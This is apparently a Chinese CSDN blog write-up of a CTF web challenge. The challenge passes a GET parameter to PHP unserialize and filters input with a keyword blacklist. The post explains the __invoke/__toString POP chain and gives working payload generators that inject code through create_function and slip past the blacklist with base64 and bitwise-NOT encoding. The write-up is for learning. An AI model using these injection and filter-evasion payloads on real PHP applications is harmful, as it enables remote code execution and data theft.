DASCTF Sept X 浙江工业大学秋季挑战赛 hellounser

最新推荐文章于 2023-05-19 17:18:39 发布
最新推荐文章于 2023-05-19 17:18:39 发布
阅读量246 收藏
点赞数 1
分类专栏: CTF 文章标签: php CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/128946920
版权
文章描述了一个PHP代码示例,其中涉及类A和B的使用,类B的show方法包含了文件并执行特定函数。通过__toString方法和__invoke方法,可以将对象当作字符串和函数调用。文章讨论了如何绕过正则表达式的限制,通过create_function实现代码注入,从而获取flag。提到了利用反序列化和编码技术来避免过滤规则,达到目标。
摘要由CSDN通过智能技术生成

我傻逼,当时没做出来,赛后看wp才理解,正则也要复习复习了

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}
class B{
    public $func;
    public $arg;
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    } 
}

if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}
?>

首先能出flag的地方只有B里show函数的文件包含部分,怎么调用这个show函数?同B类的__toString调用了,如何调用__toString?

__toString 当一个对象被当作一个字符串被调用。

对象当作字符串用,A里的show函数,输出var就是输出字符串,所以把这个var定义为B的对象,即可触发__toString,这个输出var是A的show方法,__invoke就会调用这个show方法

__invoke() 当脚本尝试将对象调用为函数时触发

下面的把pop接收后反序列化给 a a a ,而后 aaa,而后 aaa,而后aaa(),就满足了把对象当函数用

现在链子清楚了,我们可以看看如何构造命令,正则意思是func从开头到字母不能是纯数字或字母,i是大小写都匹配,s是匹配任何空白符号(空格,制表),D是结尾不是换行符号。这里很好绕过,比如含有一个_即可绕过。或者开头换行符号都可以

$arg过滤了一大堆东西,都满足就会包含flag.php,然后func作为函数名,两个参数一个空一个arg

这里可以使用create_function()这个函数,这个函数会创建匿名函数,内部会跟eval差不多的功能,所以代码注入

return(1);}任意代码;//

我们先看下目录

<?php
class A {
    public $var;   
}
class B{
    public $func;
    public $arg;
}
$a=new A;
$a->var=new B;
$a->var->func="create_function";
$a->var->arg='return(1);}system(ls);//';
echo serialize($a);
?>

Tru3flag.php应该就有真flag,包含此文件并输出,这里直接写会因为含有flag被正则过滤,所以需要编码后,输出

<?php
class A {
    public $var;   
}
class B{
    public $func;
    public $arg;
}
$a=new A;
$a->var=new B;
$a->var->func="create_function";
$a->var->arg='return(1);}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//';
echo serialize($a);
?>

返回一个包含所有已定义变量列表的多维数组,var_dump则是输出这个多维数组内容

还有一种取反的方法,我写的payload老是错,分段写比较好,但是我还是写一起了

<?php
class A {
    public $var;   
}
class B{
    public $func;
    public $arg;
}
$a=new A;
$a->var=new B;
$a->var->func="create_function";
$a->var->arg='return(1);}require(~('.strval(~('php://filter/read=convert.base64-encode/resource=Tru3flag.php')).'));//';
echo urlencode(serialize($a));
?>

这里对伪协议取反,然后strval转化成字符串,两边的点是为了把这个取反后的字符串跟两端代码连接在一起。不分开连,直接写字符串,会被认为是整体的一串字符,然后被正则过滤,因为取反后有许多不可见字符,因此需要url编码

得到的base64代码,解码即出flag

Tajang
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Visual Assist X_10.9.2237.0
10-31
Windows 10 Build 15063.608, issued Sept 12th, broke a hook mechanism. Windows Version 1709 (Fall Creators Update), released Oct 17th, broke also CreateWindow(). Microsoft is actively seeking ...
microtca_short_form_sept_2006
07-20
标题“microtca_short_form_sept_2006”和描述中的信息表明,这是一个关于MicroTCA(微型电信计算联盟)技术的标准文档,发布时间为2006年9月。MicroTCA是一种开放标准,它扩展了原有的AdvancedTCA(ATCA)规范,...
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 430
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
DASCTF Sept X 浙江工业大学秋季挑战赛rsa1
a5555678744的博客
09-26 886
这道题其实比较经典,最早应该是出现在2016年的HCTF,出题的思路可以参照这篇博客 2016 HCTF Crypto 出题总结 #! /usr/bin/env python # -*- coding: utf-8 -*- # from flag import get_flag from hashlib import sha512 import random from Crypto.Util.number import long_to_bytes, getPrime, bytes_to_long f
[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser
cosmoslin的博客
09-28 595
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function show(){
DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Le1a's Blog
09-26 312
Girlfriend’s account 下载附件,得到一个excel表格,打开得到 flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21} 也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。 excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下 百度知道链
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 258
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
Sept8Exercises
05-10
#csc462UML 2015年9月3日,用于课堂作业的起始代码存储库。 目标是让班级克隆存储库,并通过导入3个班级练习的项目来用作本地蚀工作区进行分析。 删除不需要的软件包。 将JUnit测试添加到edu.elon.test包中的ATM...
MillsAPCS-Sept2015
05-06
这个标题暗示了内容可能专注于AP Computer Science(AP计算机科学),这是一门针对美国高中学生的大学预科课程,主要教授Java编程语言。 【描述】"米尔斯APCS-2015年9月"是对标题的简短补充,进一步确认了这个资料...
fusioneer-2015-sept
05-07
$ cd fusioneer-2015-sept 安装依赖项: $ gem install bundler # if you don't have it $ bundle install 健全性检查设置 要验证所有设置是否正确,请运行以下命令: $ ruby sanity_test.rb 您应该看到以下输出...
DASCTF Sept X 浙江工业大学秋季挑战赛 web
weixin_43610673的博客
09-26 849
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function __toString(
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫(有需要的私信)
09-25 1316
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn datasystem
yongbaoii的博客
09-27 334
开了沙箱。 看到两个特征数的时候显然知道是md5了,密码需要md5.
DASCTF Sept X 浙江工业大学秋季挑战赛 writeup
09-26 2724
crypto-welcome 签到 已知n、m、c 求e,sage脚本 m = 73964803637492582853353338913523546944627084372081477892312545091623069227301 c = 21572244511100216966799370397791432119463715616349800194229377843045443048821 n = 2 ** 256 e=discrete_log(c,mod(m,n)) print(e) #348528
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hehepwn
yongbaoii的博客
09-27 409
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
PHP中类和对象的魔术方法
aben_sky的专栏
06-07 333
PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法, 包括: __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(),__serialize...
一道php反序列化题的pop链构造
good good study
05-19 1058
题目代码如下,其中像套娃一样,多次对魔术方法进行调用,挺烧脑。根据题目,显然目标是echo $flag。最后提交反序列化字符串,获取flag。最后我们用代码实现pop链的构造。然后访问,输出反序列化字符串。需要把var改为私有属性。倒退分析后,接着正推。
BUUCTF 33
qq_52431855的博客
03-01 340
知识点 __invoke()函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。 php相关知识:https://www.runoob.com/php/php-tutorial.html 33-1[MRCTF2020]Ezpop 做题思路 审计代码,提示flag在flag.php 反序列化直接分析,构造pop链 1.先分析第一个类,Modifier类 class Modifier { protected $var; public fu...
2021-10-3 安全笔记周报(php 反序列化的两道例题)(待更新)
m0_54481455的博客
10-03 4613
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
r语言中paste(la," ",pct,"%",sept="")各参数的意义
最新发布
08-17
在你提供的例子中,paste(la," ",pct,"%",sept="")的各参数的意义如下: - la: 这是一个字符向量或者一个对象,表示需要连接的第一个对象。 - " ": 这是一个字符串,表示需要添加到连接对象之间的分隔符。在这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值